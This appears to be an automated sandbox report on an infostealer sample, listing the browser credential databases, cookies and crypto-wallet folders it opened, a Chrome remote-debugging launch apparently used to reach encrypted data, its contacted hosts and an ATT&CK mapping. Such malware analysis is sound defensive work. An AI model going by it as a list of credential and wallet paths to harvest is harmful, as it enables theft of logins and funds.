                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Relationship.comBinary or memory string: WIN_81
                Source: Relationship.comBinary or memory string: WIN_XP
                Source: Relationship.com | Binary or memory string: WIN_XPe
                Source: Relationship.com | Binary or memory string: WIN_VISTA
                Source: Relationship.com | Binary or memory string: WIN_7
                Source: Relationship.com | Binary or memory string: WIN_8
                Source: Yara match | File source: 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: 10.2.Relationship.com.43f0000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Relationship.com PID: 7576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C72263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C71C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Extra Window Memory Injection; 111 Masquerading; 2 Valid Accounts; 11 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
                Credential Access: 2 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 27 System Information Discovery; 221 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Archive Collected Data; 4 Data from Local System; 21 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph ID: 1579534, Sample: GoldenContinent.exe, Startdate: 22/12/2024, Architecture: WINDOWS, Score: 100
                DNS/IP: toptek.sbs; t.me; ezaZTimpWHt.ezaZTimpWHt
                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 5 other signatures
                GoldenContinent.exe 27, started
                  cmd.exe 2, started
                    dropped: C:\Users\user\AppData\...\Relationship.com, PE32
                    signature: Drops PE files with a suspicious file extension
                    Relationship.com 28, started
                      DNS/IP: toptek.sbs 94.130.188.57, 443, 49739, 49740 HETZNER-AS DE Germany
                      DNS/IP: t.me 149.154.167.99, 443, 49738 TELEGRAM RU United Kingdom
                      DNS/IP: 127.0.0.1 unknown unknown
                      signatures: Attempt to bypass Chrome Application-Bound Encryption; Found many strings related to Crypto-Wallets (likely being stolen); Found API chain indicative of sandbox detection; 4 other signatures
                      chrome.exe, started
                        DNS/IP: 192.168.2.4, 138, 443, 49723 unknown unknown
                        DNS/IP: 239.255.255.250 unknown Reserved
                        chrome.exe, started
                          DNS/IP: www.google.com 142.250.181.68, 443, 49751, 49752 GOOGLE US United States
                      cmd.exe 1, started
                        conhost.exe, started
                        timeout.exe 1, started
                    cmd.exe 2, started
                    conhost.exe, started
                    7 other processes

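                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | GoldenContinent.exe | 11% | ReversingLabs | | |
                | GoldenContinent.exe | 13% | Virustotal | | Browse |

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | C:\Users\user\AppData\Local\Temp\523266\Relationship.com | 0% | ReversingLabs | | |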
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                |---|---|---|---|---|---|
                | toptek.sbs | 94.130.188.57 | true | true | | unknown |
                | t.me | 149.154.167.99 | true | false | | high |
                | www.google.com | 142.250.181.68 | true | false | | high |
                | ezaZTimpWHt.ezaZTimpWHt | unknown | unknown | false | | unknown |
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                            http://anglebug.com/3078chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/7553chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://anglebug.com/5375chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://anglebug.com/5371chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/4722chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2162033493.00007810023D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://anglebug.com/7556chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/xchrome.exe, 0000000F.00000003.2205983198.0000781004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRelationship.com, 0000000A.00000002.2594809497.0000000004208000.00000004.00000800.00020000.00000000.sdmp, MYC2D2.10.drfalse
                                                                                                                                                high
                                                                                                                                                https://toptek.sbsosh;Relationship.com, 0000000A.00000002.2598479689.000000000446C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://anglebug.com/6692chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://anglebug.com/3502chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://anglebug.com/3623chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://anglebug.com/3625chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/3624chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://t.mRelationship.com, 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986783267.00000000041A2000.00000004.00000800.00020000.00000000.sdmp, Relationship.com, 0000000A.00000003.1986532671.000000000187D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/3862chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000003.2172623378.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2178761795.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173217320.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173175607.0000781003144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177639604.000078100254C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/4836chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://issuetracker.google.com/issues/166475273chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://docs.google.com/presentation/:chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/4384chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/3970chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://apis.google.comchrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allRelationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://labs.google.com/search?source=ntpchrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://anglebug.com/7604chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/7761chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
